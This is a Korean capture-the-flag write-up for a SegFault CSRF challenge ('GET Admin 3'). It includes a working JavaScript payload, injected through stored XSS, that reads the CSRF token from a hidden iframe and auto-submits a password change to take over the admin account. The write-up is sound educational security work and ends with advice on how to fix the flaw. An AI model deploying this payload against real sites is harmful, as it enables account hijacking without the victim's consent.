[SegFault] (CSRF) - GET Admin 3

[SegFault] (CSRF)

GET Admin 3

admin 계정을 탈취해 로그인하면, flag를 획득할 수 있습니다.

문제 파악

본 문제의 경우 CSRF 취약점을 이용하여 비밀번호를 원하는 비밀번호로 변경하는 스크립트를 삽입하고, 관리자 visit Bot에 해당 링크를 입력하여 admin 계정의 비밀번호를 변경하여 해당 계정으로 로그인하면 flag가 나오도록 이루어져있다.

우선 위의 관리자 visit Bot 링크에 접속하면 다음과 같은 페이지가 나온다.

 

회원가입한 id의 뒤에 _amdin을 붙여넣은 id가 공격할 id 이다.

ex) gear -> gear_admin

공격할 아이디와 CSRF 공격 정보가 담겨있는 URL을 입력하면 해당 아이디의 비밀번호가 변경되게 된다.

문제 링크에 접속을 해보면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

비밀번호를 변경하는 CSRF 공격을 할 것이므로 우선 마이페이지에 들어가서 비밀변경을 실제로 시도해보고 그 과정을 확인해본다.

비밀번호 변경 과정을 확인하기 위해 비밀번호를 변경해보고 이를 Burp를 통해 확인한다.

위의 요청을 보면 pw파라미터와 함께 csrf_token이 존재하는 것을 확인할 수 있다. 이후의 과정을 살펴보면 다음과 같다.

마이페이지에서 비밀번호 변경을 요청하면, CSRF Token이 발행되고 이에 대한 일치 여부를 확인하여 비밀번호가 변경되고, 메인페이지로 돌아간다.

 

CSRF_Token

CSRF Token은 CSRF 공격을 방지하기 위한 대응책의 한가지로서 비밀번호를 변경하는 페이지에 접속할때 마다 새로이 발급되는 랜덤한 값이다.

 

CSRF Point (인증 정보)

위의 비밀번호를 변경하는 일련의 과정을 보면, CSRF 토큰을 이용하여 인증을 진행하지만, 이것은 이용자가 추가적으로 입력하는 인증정보가 아닌, 해당 페이지에 대한 올바른 접근 과정에서 발급되는 랜덤한 토큰에 불과하다. 그러므로 이는 우회가 가능하다.

 

XSS Point

XSS를 활용하지 않는 CSRF 취약점은 URL을 클릭하도록 유도해야한다. 하지만 XSS 취약점이 존재한다면 제로클릭을 구현할 수 있다.

그러므로 공지사항의 글쓰기 기능을 이용하여 XSS가 가능한지 확인해보기 위해 스크립트에 영향을 줄 수 있는 특수 문자< ' " >를 입력하여 확인해본다.

응답(Response)을 확인해본 결과 글의 내용 부분에 입력 값이 그대로 출력되고 있는 것을 확인하였다.

---

풀이 과정 (해결 방안)

CSRF 토큰을 우회하는 비밀번호 변경을 위한 페이로드(Payload)를 작성한다.

페이로드(Payload)

<iframe src="http://ctf.segfaulthub.com:7575/csrf_3/mypage.php" id="targetPage" style="display:none"></iframe>
<script>
var targetFrame=document.getElementById('targetPage');
targetFrame.onload=function(){
var domPage=targetFrame.contentDocument;
var csrfToken=domPage.getElementsByName("csrf_token")[0].value;
document.write('<iframe name="stealthFrame" sandbox="allow-scripts" style="display:none"></iframe>
<form method="POST" action="http://ctf.segfaulthub.com:7575/csrf_3/mypage_update.php" id="tempForm" target="stealthFrame"><input type="hidden" name="pw" value="1234"><input type="hidden" name="csrf_token" value="',csrfToken,'"></form>');
document.getElementById("tempForm").submit();
}
</script>

iframe에서 마이페이지에 접속하여 해당 페이지에서 다시 iframe을 이용하여 접근하도록 하여 CSRF 토큰을 발행받고 해당 값을 입력으로 넣어주는 방식을 이용하여 변경하고 싶은 비밀번호로 변경한다.

 

스크립트 삽입

XSS 취약점이 존재하는 글쓰기 기능을 이용하여 해당 페이로드를 글의 내용에 삽입한다.

해당 글에 접근해보면 다음과 같이 스크립트가 활성화되어 있는 것을 확인할 수 있다.

이후의 과정을 살펴보면 마이페이지에 접근하여, 비밀번호 변경을 진행한다.

이제 해당 글에 접근하는 URL을 관리자 visit Bot에 넣어준다.

이후 로그아웃을 하고 관리자 계정으로의 로그인을 시도한다.

관리자 계정을 변경시킨 비밀번호를 입력하여 로그인하면 성공적으로 로그인되고 다음과 같이 알림창에 Flag값이 출력되는 것을 확인할수 있다.

위와 같이 관리자 계정으로의 로그인을 통해 flag 값이 획득되는 것을 확인할 수 있다.

---

취약점에 관한 고찰

본 문제의 경우 비밀번호 변경에 있어 CSRF 토큰이 존재하지만, 이용자가 입력하는 추가적인 인증정보 없이 변경이 가능하여 발생한 CSRF 취약점이다.
CSRF Token의 경우 비밀번호 변경 페이지로 접근하기 위한 이전페이지, 즉 이 문제의 경우 마이페이지에 해당하는 부분에서 올바른 방법으로 들어오는 경우, 발급되는 랜덤한 토큰으로 비밀번호 변경 과정에서 이를 확인하게 된다.
하지만 본 문제 처럼 토큰으로 처리하는 경우 iframe을 2번 이용하여 우회가 가능한 경우도 있기 때문에 비밀번호 변경에 있어서는 추가적인 인증 절차를 구현하도록 한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영